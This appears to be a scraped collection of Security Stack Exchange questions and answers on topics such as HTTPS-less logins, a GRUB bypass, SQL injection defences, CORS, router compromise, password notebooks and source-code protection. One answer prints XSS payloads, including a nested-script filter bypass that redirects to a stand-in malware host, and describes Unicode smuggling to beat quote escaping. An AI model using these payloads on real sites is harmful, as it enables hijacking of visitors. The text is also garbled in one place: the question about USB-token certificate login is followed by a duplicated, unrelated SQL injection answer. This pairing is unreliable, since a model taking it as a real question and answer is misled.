{ "source": [ "https://security.stackexchange.com/questions/108191", "https://security.stackexchange.com", "https://security.stackexchange.com/users/37853/" ] }
108,310
I have to make a website for a NGO (Non-Governmental Organization), and they have the minimal options from their provider, so they can't have SSL/TLS (barely only HTML/PHP/MySQL/JS) The data that goes from and to the server aren't very sensitive, but I don't want their passwords, name and address to be sent clear on the web. I thought about ciphering data inside the JavaScript that calls the API functions with RSA (I'm no expert, but this lib seems pretty efficient), but I red an article that strongly advise not to use JavaScript for crypto (I'm French and maybe I didn't get everything right, but I got the main point). So what should I use to cipher the data over the network? If JS isn't really a bad idea, what can I do to ensure maximum safety with the technology I can use on this server (once again, no HTTPS, sadly), apart from importing the lib on my server and not relying on importing it from a different sever?
No SSL, no security. Things in the real world are rarely simple, but here it is the case. This is easily seen as follows: whatever you do in Javascript, will be done in Javascript sent by the server . Any attacker who is in position to look at the data can also modify it at will (e.g. the easiest way to spy on WiFi is to run your own fake access point, and then you naturally get to modify all data as it comes and goes); thus, such an attacker can simply remove or alter whatever Javascript-based solution you may come up with, and deactivate it. Or just add a hook to also send the password in the clear as an extra parameter. Now, even if you could get "safe Javascript" on the client browser, then you would run into all the problems that Javascript crypto entails, and that are detailed in the article you link to. But this is only a secondary consideration, compared with the fundamental flaw explained above: with no SSL, you cannot ensure that what runs on the client browser is your code. Trying to handle password securely on a non-SSL Web site is akin to trying to perform brain surgery safely with only a tea spoon and a rusty crowbar. Just don't do it. If there is sensitive data that flows to the Web site (e.g. names and addresses), then you MUST apply reasonable protection mechanisms. If the data is not sensitive, then why would you need passwords ?
{ "source": [ "https://security.stackexchange.com/questions/108310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69673/" ] }
108,428
I just read a few articles about a new Grub vulnerability. The article said that you can bypass the password protection by pressing backspace twenty eight times. I am a security guy and I am concerned about the vulnerability, so I would like to know what measure is GNU and Linux taking? Is there a security update/fix/patch and can I do anything myself to keep my computer secure? I always keep my OS, web browser, and programs up to date, so will that help? Here are the articles: The Hacker News Lifehacker
The main thing that is happening is that the bug is being seriously overhyped. Exploiting this vulnerability requires physical access to the computer during startup, and if you've got physical access, there are about a zillion ways you can bypass security. The bug is about bypassing Grub2's internal password protection. Most users don't password-protect Grub2. The bug is in the Grub2 bootloader. If you're using direct boot from UEFI, LILO, classic Grub, or any of the non-x86 bootloaders, you're not vulnerable to it. If you're worried about this bug, install your distro's patch for it, but keep in mind that, except in unusual circumstances, the vulnerability doesn't actually reduce security.
{ "source": [ "https://security.stackexchange.com/questions/108428", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94833/" ] }
108,472
I know some developers double up apostrophes to mitigate SQLi. (This is when the input is ' so it becomes '') Is there a way to beat this? This is on MS SQl Server.
I try to show both sides of the security spectrum. Security is important, so you shouldn't just know how to defeat security, you should know how to implement it as well. Thus, I'm going to list a prevention first. If you don't want to read this, scroll down. How do I prevent SQL injection? Doubling up apostrophes is not the answer when it comes to security, and it can lead to insecurity. The answer depends on the programming language you're using. For SQL Server / Oracle / MySQL With Java, use CallableStatements and PreparedStatements correctly. With PHP, you'll need the appropriate Prepared Statements. With C#/VB.NET, you'll need parameterized queries. Note that these are all the same concepts in every language. They just have different names. Even with prepared/callable statements or parameterized queries, the following is incorrect: // Bad code, don't use string sqlString = "SELECT * FROM [table] WHERE [col] = '"+ something +"' AND [col2] = @Param"; You must never concatenate your SQL variables. With SQL server, depending on your chosen language of choice, your query should look something like this: C# using (SqlCommand command = new ("SELECT * FROM [tab] WHERE LName = @LName", connection)) { // Add new SqlParameter to the command. command.Parameters.Add(new SqlParameter("LName", txtBox.Test)); // Read in the SELECT results. SqlDataReader reader = command.ExecuteReader(); while (reader.Read()) { } } Java Connection con = DriverManager.getConnection("database-connection-string","name","pass"); // Question marks are the bound variables which are parsed in the defined column order. PreparedStatement findLName = con.prepareStatement("SELECT * FROM [tab] WHERE LName = ?"); // The order in which the question marks appear. You can have more than one in a prepared statement. First one is "1", second is "2", and so on. findLName.setString(1, Lastname); findLName.executeQuery(); Statement stmt = con.createStatement(); PHP Check w3schools for an example, I don't want my answer getting too long. Note that this still doesn't get rid of potential injection of scripts onto a web page. You could insert exactly as they ask, within acceptable ranges, and then output the results to HTML. If they insert the following (dumbed-down example): <script> window.location.href='hxxp://www.mymalwarewebsite.com/'; </script> ...and you output that result to your page, then you're in big trouble. So what if you remove anything from <script> to </script> ? What if they insert: <scri<script>pt> window.location.href='hxxp://www.mymalwarewebsite.com/'; </scri<script>pt> ...? If you remove the script tags with replace, you're still stuck with that exploit. What you really want is the following in addition to the above : For C#, you'll want to use HtmlEncode For Java, you'll want to use Java Html Sanitizer from OWASP For PHP, you'll want to use HtmlEntities . For all cases involving unicode parsing, you want to prevent unicode injection. Shut up, Mark! How do I beat doubling up apostrophes? You may be able to beat them in different ways ; you may be able to force various SQL databases to translate unicode to the local charset . For example, Ā could be converted to A . Even worse: U+02BC , or ʼ would be translated as ' , which is U+0027 . This is called Unicode-based Smuggling . Doubling quotes doesn't work in older versions of MySQL. Although not really an SQL injection attack, you can try to force the website to inject malicious code to display to their users. You can try inserting script tags (read above for an example). Imagine injecting a drive-by download when people view your page, or a user list. Although not technically an SQL injection attack, you may be able to beat this protection by looking through the console in your browser and checking for integers being sent to the database, and then modify the request. This is called a Direct Object Reference exploit. There are various tools which can do this. Prepared Statements will not protect you against this attack. Please read the OWASP article
{ "source": [ "https://security.stackexchange.com/questions/108472", "https://security.stackexchange.com", "https://security.stackexchange.com/users/63692/" ] }
108,474
I have the following situation: One user with a USB token certificate access a site and log-in using this certificate, the logging process ask for the USB token password; When the user is logged he can make anything in this site. My objective is to automate this process using an PHP web application, for example. The main question is: how to use this USB token certificate to log-in on the server? Any suggestion?
I try to show both sides of the security spectrum. Security is important, so you shouldn't just know how to defeat security, you should know how to implement it as well. Thus, I'm going to list a prevention first. If you don't want to read this, scroll down. How do I prevent SQL injection? Doubling up apostrophes is not the answer when it comes to security, and it can lead to insecurity. The answer depends on the programming language you're using. For SQL Server / Oracle / MySQL With Java, use CallableStatements and PreparedStatements correctly. With PHP, you'll need the appropriate Prepared Statements. With C#/VB.NET, you'll need parameterized queries. Note that these are all the same concepts in every language. They just have different names. Even with prepared/callable statements or parameterized queries, the following is incorrect: // Bad code, don't use string sqlString = "SELECT * FROM [table] WHERE [col] = '"+ something +"' AND [col2] = @Param"; You must never concatenate your SQL variables. With SQL server, depending on your chosen language of choice, your query should look something like this: C# using (SqlCommand command = new ("SELECT * FROM [tab] WHERE LName = @LName", connection)) { // Add new SqlParameter to the command. command.Parameters.Add(new SqlParameter("LName", txtBox.Test)); // Read in the SELECT results. SqlDataReader reader = command.ExecuteReader(); while (reader.Read()) { } } Java Connection con = DriverManager.getConnection("database-connection-string","name","pass"); // Question marks are the bound variables which are parsed in the defined column order. PreparedStatement findLName = con.prepareStatement("SELECT * FROM [tab] WHERE LName = ?"); // The order in which the question marks appear. You can have more than one in a prepared statement. First one is "1", second is "2", and so on. findLName.setString(1, Lastname); findLName.executeQuery(); Statement stmt = con.createStatement(); PHP Check w3schools for an example, I don't want my answer getting too long. Note that this still doesn't get rid of potential injection of scripts onto a web page. You could insert exactly as they ask, within acceptable ranges, and then output the results to HTML. If they insert the following (dumbed-down example): <script> window.location.href='hxxp://www.mymalwarewebsite.com/'; </script> ...and you output that result to your page, then you're in big trouble. So what if you remove anything from <script> to </script> ? What if they insert: <scri<script>pt> window.location.href='hxxp://www.mymalwarewebsite.com/'; </scri<script>pt> ...? If you remove the script tags with replace, you're still stuck with that exploit. What you really want is the following in addition to the above : For C#, you'll want to use HtmlEncode For Java, you'll want to use Java Html Sanitizer from OWASP For PHP, you'll want to use HtmlEntities . For all cases involving unicode parsing, you want to prevent unicode injection. Shut up, Mark! How do I beat doubling up apostrophes? You may be able to beat them in different ways ; you may be able to force various SQL databases to translate unicode to the local charset . For example, Ā could be converted to A . Even worse: U+02BC , or ʼ would be translated as ' , which is U+0027 . This is called Unicode-based Smuggling . Doubling quotes doesn't work in older versions of MySQL. Although not really an SQL injection attack, you can try to force the website to inject malicious code to display to their users. You can try inserting script tags (read above for an example). Imagine injecting a drive-by download when people view your page, or a user list. Although not technically an SQL injection attack, you may be able to beat this protection by looking through the console in your browser and checking for integers being sent to the database, and then modify the request. This is called a Direct Object Reference exploit. There are various tools which can do this. Prepared Statements will not protect you against this attack. Please read the OWASP article
{ "source": [ "https://security.stackexchange.com/questions/108474", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94834/" ] }
108,653
If you connect a computer that is infected with malware (the government grade, kernel infecting, extremely persistent, easily spreadable kind) to a router or modem, can the router or modem or its firmware be infected in such a way that, when you connect another computer to it, the infection transfers? The two computers are never on the LAN at the same time.
You don't need government grade malware to do this and such attacks have actually been carried out for years. Typical SOHO routers are often vulnerable to CSRF and similar attacks and this can be used by the attacker to compromise the router, i.e. changing critical settings like the DNS servers. This compromise can be executed when you visit a web site. It does not even need to be a "bad" site since such an attack can be executed from inside embedded advertisements too ( malvertisement ). For an example of such an attack see How millions of DSL modems were hacked in Brazil,... which talks about how attackers compromised millions of routers in Brazil using CSRF attacks. They then changed the DNS settings in the router so that the traffic got diverted to the attacker. With this man in the middle attack the attacker then could inject advertisements or malware into the traffic to every computer using this router. These attacks are unfortunately very common today since a large proportion of SOHO routers are insecure. See Website Security – Compromised Website Used To Hack Home Routers for hacking via compromised web sites or Spam Uses Default Passwords to Hack Routers for similar hacks done via spam mails. As for the enterprise level routers: Once you are in (maybe via a backdoor ) you effectively own a large network with often sensitive information inside. By manipulating the routing you can divert the traffic to the attacker and do the same attacks and more as described above. The main difference is that you have far more computers behind the router and these have usually more more interesting information than you will find in home networks. This means the return of investment for the attacker is usually higher when enterprise routers or even routers as ISP's are compromised.
{ "source": [ "https://security.stackexchange.com/questions/108653", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94858/" ] }
108,662
What exactly is the difference between following two headers: Authorization : Bearer cn389ncoiwuencr vs Authorization : cn389ncoiwuencr All the sources which I have gone through, sets the value of 'Authorization' header as 'Bearer' followed by the actual token. However, I have not been able to understand the significance of it. What if I simply put the token in the Authorization header?
The Authorization: <type> <credentials> pattern was introduced by the W3C in HTTP 1.0 , and has been reused in many places since. Many web servers support multiple methods of authorization. In those cases sending just the token isn't sufficient. Sites that use the Authorization : Bearer cn389ncoiwuencr format are most likely implementing OAuth 2.0 bearer tokens .The OAuth 2.0 Authorization Framework sets a number of other requirements to keep authorization secure, for instance requiring the use of HTTPS/TLS. If you're integrating with a service that is using OAuth 2.0 it is a good idea to get familiar with the framework so that the flow you're using is implemented correctly, and avoiding unnecessary vulnerabilities. There are a number of good tutorials available online.
{ "source": [ "https://security.stackexchange.com/questions/108662", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94951/" ] }
108,676
I need to access the web interface of a router standing here in the office. The problem is that it only supports SSLv3 and I cannot find a browser that allows me to connect to it. In order to update the router, I also need to be able to login to it. I tried to SSH into it, but it does not work. Maybe it is using some non-standard port. Running a (limited?) port scan using 'fing' I see it has the following standard ports open: 515 (LPD printer) 1723 (PPTP) What browser can I use, or what other options do I have? Unable to Connect Securely Firefox cannot guarantee the safety of your data on 192.168.1.1:10443 because it uses SSLv3, a broken security protocol. Advanced info: ssl_error_unsupported_version
Internet Explorer 11 supports it, but you have to go to Advanced options Tab to enable it.
{ "source": [ "https://security.stackexchange.com/questions/108676", "https://security.stackexchange.com", "https://security.stackexchange.com/users/9588/" ] }
108,746
Answers to the question " How safe are password managers like LastPass? " suggest that storing personal passwords on a physical notebook might be a reasonable option: I know someone who won't use Password Safe and instead has a physical notebook with his passwords in obfuscated form. This notebook is obviously much safer against malware... whether it's at greater risk of loss/theft is an interesting question. Obviously, a piece of paper is secure against any malware attacks. The requirement is for an offline access of credentials. For example a small notebook on which you write all your security details for all banks, stores, websites, even combination locks, addresses and all other details you may wish to be able to access from any location in the world. Also, it can sometimes be easier to look up passwords in a notebook -- e.g. if you travel a lot, you could store passwords on your smartphone using a password manager app. However, this means your phone needs to be charged and operational all the time, which adds another point of failure. Now, disregarding the posibilities that a notebook might be lost, stolen completely, destroyed or otherwise physically harmed, I'd like to focus on a one question: How would you obfuscate (as mentioned in the first quote) passwords so that they cannot easily be deciphered by someone who is able to throw a glance at the notebook? On the other hand, the algorithm must be simple enough so that the owner of the notebook can decode his or her own passwords in almost no time. Bonus questions: Could such an algorithm be considered more or less secure even if it's posted here on Information Security or does obfuscation always imply security through obscurity (i.e. keeping the algorithm itself secret)? Could an obfuscation algorithm be designed in such a way that it would be impossible or unlikely to decipher the passwords, even if a hypothetical attacker had access to the notebook for at least several hours? Or would that naturally contradict the requirement that the owner can decode his/her passwords quickly?
In approximate order of increasing complexity ( not security, and methods may be combined), here are some ideas that would be easy for anyone used to puzzles/writing code/maths. A more complete idea is below. NB: when I say "secret" I mean not written in the book. These are all easy, and most useful to deter the casual thief. Have a memorised secret element, common to all passwords. * Minor variant -- an secret element easily derived from the website name/username. Put too much information in the book, e.g. know that actually you omit the first 4 characters of each password.* Offset the account and password by some constant number of entries. * Never write the full username, just enough to be a clue to you. * These items have the significant vulnerability that once the obfuscation is cracked for one entry, it's automatically cracked for all entries with no further effort. If the exact algorithm is published, clearly a notebook-thief who could also script login attempts (or a team of course) could apply the algorithm automagically -- or all published algorithms. The type of algorithm could be published, for example: From the password as written, call the first digit x and the second y . Count x characters from the first punctuation mark (or first character, or first digit). Then swap the cases of the next y letters (or preceeding y ) letters. For a memorised 4-digit PIN, increment the first four letters by the numbers of the pin (e.g. 1234 applied to a!bcd would give b!dfh ). Of course you could: Swap the meanings of x and y Increment/decrement x and y . Count from the first vowel . Swap the cases of y consonants . Replace digits with their corresponding letters by alphabetic position and vice versa. Swap digits for the punctuation on the same key (you either need to be confident in the keyboard layout you'll encounter or know your own keyboard very well.) All these operations, by definition, can be scripted. But the notebook thief would have to get hold of (or write) a script implementing these (and it's actually quite a variable space even without a secret element. Then they'd have to type in the passwords (an error-prone process with randomly-generated text), run the script over the list, and attempt to log in with the now potentially thousands of passwords per site. And hope that the site doesn't lock out after several failed attempts. It would be worth keeping a backup list, even if not a backup copy of the book, as a list of sites for which the passwords should be changed/accounts flagged if the book went missing. As with many security measures, the goal must be to make it too much effort to break in. By combining manual and scripted effort you're doing quite a lot towards that, and increasing your chances that they'll give up.
{ "source": [ "https://security.stackexchange.com/questions/108746", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95041/" ] }
108,830
I recently had to read over some malware reports and associated logs for a confirmed malware detection and subsequent infection of a Windows asset. The logs clearly show .dll files in a user’s AppData folder. These .dll files are named the same as .dll s normally found in system32 , e.g cryptbase.dll . I know that in this specific instance this was definitely malware and the unpacking of the rogue .dll s was part of the malware's normal process. I asked about this in chat and was told that the only real credible explanation for this behaviour would be malware (as it was in this instance) or very bad programming practice, and even in that case it is a scenario that is rare. My question is twofold; is there a scenario where .dll files with the same name as standard system32 .dll s be found in an user's AppData folder for any reason other than malware or poor programming? In addition, is it fair to treat .dll files that are found in AppData and appear to be copies of .dll files in system32 , as an indicator of compromise?
Since Microsoft has straightened the default permissions on the Program Files folder, many developers have turned to AppData as an alternative location for their code. The logic being that an application installed this way can be updated without requiring elevation or admin level access. (Google Chrome, for instance, does this). This also means that, sometimes, you will find legitimate libraries that usually live in the system32 folder somewhere under the AppData path. These usually are run-time components (like the MSVCRT, GDI+ or capicom) that are maintained and updated by the application itself (usually because they require a specific version to work but sometimes because they are pushed as a user component instead of a system one and needs to be deployed without elevation). That does not mean that you should find libraries belonging to the operating system there: there is no legitimate reason for, say, schannel.dll to be found there since the only application that maintain that library is the operating system. So, dlls under AppData having the same name as a dll in system32 are not automatically suspicious.
{ "source": [ "https://security.stackexchange.com/questions/108830", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83641/" ] }
108,835
I recently learned about CORS and got the impression that its purpose is to prevent XSS . With CORS, the browser blocks requests to different domains, unless particular headers are in place. But if a person with malicious intent injects some JavaScript into a page to steal users' cookies and send them to a URL he controls, all he has to do is add the following header on the server side to make the request work anyway: Access-Control-Allow-Origin: * So how does CORS prevent XSS? Or did I misunderstand the purpose of CORS, and it simply has nothing to do with XSS per se?
TL;DR: How does CORS prevent XSS? It does not. It is not meant to do so. CORS is intended to allow resource hosts (any service that makes its data available via HTTP) to restrict which websites may access that data. Example: You are hosting a website that shows traffic data and you are using AJAX requests on your website. If SOP and CORS were not there, any other website could show your traffic data by simply AJAXing to your endpoints; anyone could easily "steal" your data and thus your users and your money. In some cases that sharing of data ( C ross O rigin R esource S haring) is intended, e.g. when displaying likes and stuff from the Facebook API on your webpage. Simply removing SOP to accomplish that is a bad idea because of the reasons explained in the above paragraph. So CORS was introduced. CORS is unrelated to XSS because any attacker who can place an evil piece of JavaScript into a website can also set up a server that sends correct CORS headers. CORS cannot prevent malicious JavaScript from sending session ids and permlogin cookies back to the attacker.
{ "source": [ "https://security.stackexchange.com/questions/108835", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95186/" ] }
109,087
I recently read the canonical answer of our ursine overlord to the question on How do certification authorities store their private root keys? I then just had to ask myself: How do large companies (e.g. Microsoft, Apple, ...) protect their valuable source code? In particular I was asking myself, how do they protect their source code against theft, against malicious externally based modification and against malicious insider-based modification. The first sub-question was already (somewhat) answered in CodeExpress' answer on How to prevent private data being disclosed outside of Organization . The reasoning for the questions is simple: If the source code would be stolen, a) would the company be (at least partially) hindered from selling it and b) would the product be at risk of source code based attack search. Just imagine what would happen if the Windows or iOS source code was stolen. If the code would be modified by malicious external attackers, secret backdoors may be added which can be catastrophic. This is what happened with Juniper lately, where the coordinates of the second DUAL_EC_DRBG point were replaced in their source. If the code would be modified by an internal attacker (e.g. an Apple iOS engineer?) that person could make a lot of money by selling said backdoors and can put the product at severe risk if the modified version ships. Please don't come up with "law" and "contracts". While these are effective measures against theft and modification, they certainly don't work as well as technical defenses and won't stop aggressive attackers ( i.e. other governments' agencies).
First off, I want to say that just because a company is big doesn't mean their security will be any better. That said, I'll mention that having done security work in a large number of Fortune 500 companies, including lots of name-brands most people are familiar with, I'll say that currently 60-70% of them don't do as much as you'd think they should do. Some even give hundreds of third-party companies around the world full access to pull from their codebase, but not necessarily write to it. A few use multiple private Github repositories for separate projects with two-factor authentication enabled and tight control over who they grant access too and have a process to quickly revoke access when anyone leaves. A few others are very serious about protecting things, so they do everything in house and use what to many other companies would look like excessive levels of security control and employee monitoring. These companies use solutions like Data Loss Prevention (DLP) tools to watch for code exfiltration, internal VPN access to heavily hardened environments just for development with a ton of traditional security controls and monitoring, and, in some cases, full-packet capture of all traffic in the environment where the code is stored. But as of 2015 this situation is still very rare. Something that may be of interest and which has always seemed unusual to me is that the financial industry, especially banks, have far worse security than one would think and that the pharmaceutical industry are much better than other industries, including many defense contractors. There are some industries that are absolutely horrible about security. I mention this because there are other dynamics at play: it's not just big companies versus small ones, a large part of it has to do with organizational culture. To answer your question, I'm going to point out that it's the business as a whole making these decisions and not the security teams. If the security teams were in charge of everything, or even knew about all the projects going on, things probably wouldn't look anything like they do today. That said, you should keep in mind that most large businesses are publicly traded and for a number of reasons tend to be much more concerned with short-term profits, meeting quarterly numbers, and competing for marketshare against their other large competitors than about security risks, even if the risks could effectively destroy their business. So keep that in mind when reading the following answers. If source code were stolen: Most wouldn't care and it would have almost no impact on their brand or sales. Keep in mind that the code itself is in many cases not what stores the value of a company's offering. If someone else got a copy of Windows 10 source, they couldn't suddenly create a company selling a Windows 10 clone OS and be able to support it. The code itself is only part of the solution sold. Would the product be at greater risk because of this? Yes absolutely. External Modification: Yes, but this is harder to do, and easier to catch. That said, since most companies are not seriously monitoring this it's a very real possibility that this has happened to many large companies, especially if back-door access to their software is of significant value to other nation-states. This probably happens a lot more often than people realize. Internal Attacker: Depending on how smart the attacker was, this may never even be noticed or could be made to look like an inconspicuous programming mistake. Outside of background checks and behavior monitoring, there is not much that can prevent this, but hopefully some source-code analysis tools would catch this and force the team to correct it. This is a particularly tough attack to defend against and is the reason a few companies don't outsource work to other countries and do comprehensive background checks on their developers. Static source code analysis tools are getting better, but there will always be gap between what they can detect and what can be done. In a nutshell, the holes will always come out before the fixes, so dealing with most security issues becomes something of a race against time. Security tools help give you time-tradeoffs but you'll never have "perfect" security and getting close to that can get very expensive in terms of time (slowing developers down or requiring a lot more man-hours somewhere else). Again, just because a company is big doesn't mean they have good security. I've seen some small companies with much better security than their larger competitors, and I think this will increasingly be the case since smaller companies that want to take their security more seriously don't have to do massive organizational changes, where larger companies will be forced to stick with the way they've been doing things in the past due to the transition cost. More importantly, I think it's easier for a new company (of any size, but especially smaller ones) to have security heavily integrated into it's core culture rather having to change their current/legacy cultures like older companies have to. There may even be opportunities now to take market share away from the a less secure product by creating a very secure version of it. Likewise, I think your question is important for a totally different reason: security is still in it's infancy, so we need better solutions in areas like code management where there is a lot of room for improvement.
{ "source": [ "https://security.stackexchange.com/questions/109087", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71460/" ] }
109,113
Here is a link given on curl's official website: (prefix omitted) bintray.com/artifact/download/vszakats/generic/curl-7.46.0-win64-mingw.7z When I downloaded it with prefixes http:// and https:// I got two different files. My question is why is this site serving two different files -- one over HTTP and one over HTTPS? The SHA256 hashes do not match. Here is a diff of the final URLs after redirect. The URL on the left is the one that HTTP redirects to and the URL on the right is the one HTTPS redirects to: Update: The two files were not downloaded concurrently, but they had the same version number, so I assumed they should be the same. This is not the case. The author told me some revisions do not get a new version number. The scan results for the files served from the site on different dates ( 12/05/15 was the scan date for the download over HTTP and 12/28/15 was the scan date for the download over HTTPS) led to confusion because the version number did not change but the SHA256 hash did.
The simple answer is: because it wants to! The web server can serve whatever it likes, either by configuration or coincidence. Right now, I get the same 75916c7b file over both HTTP and HTTPS and cannot confirm your theory that the web server is serving different content for HTTPS versus HTTP. However, if you managed to access the site near the time the file was updated, it could very well be that different servers were serving the different protocols and the file update had not yet propagated to the server that served you the old file. Remember that one URL can be served by any number of servers - the fact that you get one file from a URL does not exclude there being 20 copies of this file on 20 servers/caches, some of which may be out of date. This a certainty in this case, as the website appears to be using Cloudfront which is a Content Delivery Network - a piece of infrastructure explicitly designed for caching files on many distributed servers for delivery at global scale.
{ "source": [ "https://security.stackexchange.com/questions/109113", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95441/" ] }
109,142
I just found that a website of one Polish bank forces the users to open it in one browser tab only. You cannot for example check your transfer history while looking for an account number that you want to send money to. I cannot think of any good reasons for doing this except possible security reasons. Are there security advantages to limiting a site to only one site? If so, what are they?
Generally, no, it's not reasonable to force users to a single tab. There are no technical security reasons for making a website available to a single tab only. This is generally common just due to poor system design. Forcing a single tab also means that when you log out, you won't leave your sensitive information plastered in twenty other tabs. This is poor reason though, as a site that is bothered about this can use localStorage or websocket to simultaneously clear all tabs when logging out from one tab. The human factor of security is a marginal reason why some sites might deliberately restrict itself to a single tab. By forcing a single tab, you force people to focus on one thing at a time, and this makes you less likely to forget something. IMO, this is a poor reason, as the drawbacks outweighs the advantages.
{ "source": [ "https://security.stackexchange.com/questions/109142", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15648/" ] }
109,171
My parents have a vacation home out in the country and are looking to setup a home surveillance system for remote viewing. I've heard that there can be serious vulnerabilities in these products. What are some guidelines I could use to help evaluate these products? I have a software development background, so I'm comfortable with technical answers, but I'm certainly not a professional as far as system administration or network configuration. My parents are looking to spend under $300, though they can spend more if that's unrealistically low for a well protected system, so my financial resources to perform a security evaluation myself are limited.
Like most embedded hardware (routers, etc), their firmware often sucks, and unless you have unlimited time I'm afraid there is no way to thoroughly check every single camera out there. And even if you do find one that's currently secure, what guarantees that you'll get updates for vulnerabilities that will be discovered in the future ? Instead, I suggest just creating your own IP cameras by using USB webcams (or cheap/insecure IP cameras) and connecting them to a Linux/BSD computer that will actually handle all the authentication/security and then rebroadcast the camera's video feed (preferably over something secure like HTTPS). That way the internet-facing part of your home-made "camera" can be updated and hardened just like any computer, and behind it you are free to put any camera you want, including the cheapest garbage since it won't be exposed to the Internet anyway. Finally consider putting the camera system on a separate network air-gapped from the Internet - I know it doesn't apply in your case but I'd still like to mention it - the requirement for physical access is a pretty good security measure, as someone who wants to spy on you now has to physically break into your home rather than being thousands of miles away. If off-site recording is required, video could be encrypted and then streamed outside of the air-gap via a one-way Ethernet cable with the key kept securely, so that the data leaving the air-gap is meaningless unless the correct key is provided.
{ "source": [ "https://security.stackexchange.com/questions/109171", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92643/" ] }
109,184
One of the easy ways to install a program in Ubuntu Linux is to type a command in the terminal, but how do I know that the program is coming from a trusted source and not from somewhere dangerous? For example, if I was installing ClamAV, how do I know ClamAV came from www.clamav.net or somewhere safe and not from a malicious source? I mean, a hacker can do something to redirect the command to make it get the software from a fake site, correct?
As with many well-designed systems, the package system of Debian has defense in depth : multiple layers, each of which can be verified. How do we trust the package file is what the system promises? The hash value is computed and compared against the stored value. How do we trust the hash value isn't accidentally matching some other file? Multiple hash algorithms are used, and only if all those match the stored values do we trust the content actually matches. How do we trust the stored values are meant for the package file we downloaded? The hash values are downloaded in a separate file (the various Packages.* files) pre-computed automatically by the archive system. How do we trust the downloaded Packages.* files are what is promised by the system? The hash value for each file is stored in a single Release file for the whole archive. How do we trust that the Release file is what is promised by the system? The cryptographic signature is computed, and compared against the separately-downloaded pre-computed signature from the archive. How do we trust the signatures stored in the archive are actually from the archive we expected? It is certified by an archive key which we can fetch independently from a separate URL, and is installed in the initial set-up of the operating system. And so on. At some point in the chain you have to trust some part of (and party in) the system, on less-than-ideal evidence. With the above layers, the low-evidence trust window can be kept small and easily-scrutinised. The one-way hashes, and cryptographic signatures, allow us to trust the mathematics to certify what follows in sequence. The Debian wiki has a good, comprehensive description of how the APT system is secured . Of course, many other things can go wrong by mistake or malice, and violate our assumptions about what is actually happening. As usual, the only persistent defense against possible attacks is: eternal vigilance.
{ "source": [ "https://security.stackexchange.com/questions/109184", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94833/" ] }
109,199
If you could get physical access to a server, you could change the root/admin password even if you did not know the current password. However with encrypted disks, I don't think this is possible (or is it?). So, does this mean physically securing your server has become less important - it's still needed for other reasons - but is this reason no longer there?
Physical access, in many, likely most, situations means a total loss of security - for a variety of reasons (this all assumes encrypted disks): Theft - An attacker could steal the server or disks, to attack at their pace. This allows an attacker to take their time, and you have no idea if they've actually gained access to data. Physical Modification - If I can access a server, I could add hardware, this could be anything from USB or keyboard logging to adding a wireless interface to allow remote access. Cold Boot Attack - There are attacks that can be used to extract encryption keys, allowing decryption of the disks. etc. There are others of course, but this is just a sample of what can happen if an attacker has physical access. There are possible attacks that are still somewhat theoretical, such as applying backdoored UEFI images and the like. Possibly the worst part of a physical attack, is that you may not even know what exactly was done, so there's a real problem with being able to trust the hardware afterwards.
{ "source": [ "https://security.stackexchange.com/questions/109199", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20195/" ] }
109,273
The Wikipedia article about Faraday cages has this anecdote: A Faraday cage was used in 2013 by the Vatican to shield the Sistine Chapel from electronic eavesdropping during the secret papal conclave to elect the next pope. Source: "Papal Election: Vatican Installs Anti-leak Security Devices at the Sistine Chapel" . International Business Times. 2013-03-10. My question is, what would this accomplish? I can see two motivators: they either don't want what they discuss to become public, or they don't want people to have any inclination as to what the decision is leaning towards before it is made. If it's the first motivator, a Faraday cage won't help. Hardware could be recording and transmit when the cage is removed or be retrieved at a later date. If it's the second motivator, it's probably a better question for the Catholic stackexchange, but I do not know of any reason why this would really matter (are people making huge bets on the outcome? If so, why does the church care?). Is there some other reason for the use of a Faraday cage I haven't thought of?
When you read up on the source quoted in the article , you will notice that it apparently isn't talking about a "real" Farraday cage around the Sistine Chapel (putting a whole building under a wiremesh dome would be ridiculous even for the Catholic church) but rather about a figurative one in form of: the installation of equipment which blocks any electronic signals from getting out of the Sistine Chapel. The author doesn't seem to be very tech-literate (see second to last paragraph), but it appears like he is talking about GSM jammers or similar devices which make cellphone communication impossible though active interference, not passive blocking. Such device are available commercially over the shelf for affordable prices . By the way: such devices violate broadcasting regulations in many countries making them illegal. But the Vatican is a sovereign state, so they don't have that problem. The main motivation for this measure was that during the last conclave in 2005, the election of Pope Benedict XVI was leaked to the media before the official announcement. This is what the Catholic church wanted to prevent from happening again in 2013 and this is why they took technological measures to prevent anyone inside the conclave from communicating with the outside world until the official announcement. Leaking information later was a secondary concern.
{ "source": [ "https://security.stackexchange.com/questions/109273", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95435/" ] }
109,293
On a POSIX system, is there a possibility for a file which is non-executable and read-only (aka with a mode 444) to run malicious code on a machine? If so, can you explain how it would do so?
Yes, something just has to execute it. The X flag hints to the shell that it can be directly executed, but that doesn't stop other programs from executing it if they know how. For example, if you have a file a.sh which is not executable to the shell, you can execute it by calling bash a.sh (which tells bash explicitly to execute it). If you have a non-executable file a.py , you can execute it by calling python a.py . I'd imagine there's also a way to tell the OS to execute a binary ELF file, but I don't know the command off hand. There are also a whole class of things which don't require you to do anything in particular to make it execute malicious code. PDFs and Adobe Flash files in particular have had some well-known holes which allowed the simple act of reading a file to execute malicious code. There are also some files which, in specific places, and be auto-executed (especially on Windows). Also, if the file is compressed, it may contain a buffer-overflow virus for the decompressor. The file also may be even more malicious, taking advantage of a yet-unknown bug in the file system or something else really low-level. Bottom line: the only way to guarantee something won't infect your computer is to never do anything with anything.
{ "source": [ "https://security.stackexchange.com/questions/109293", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95628/" ] }
109,398
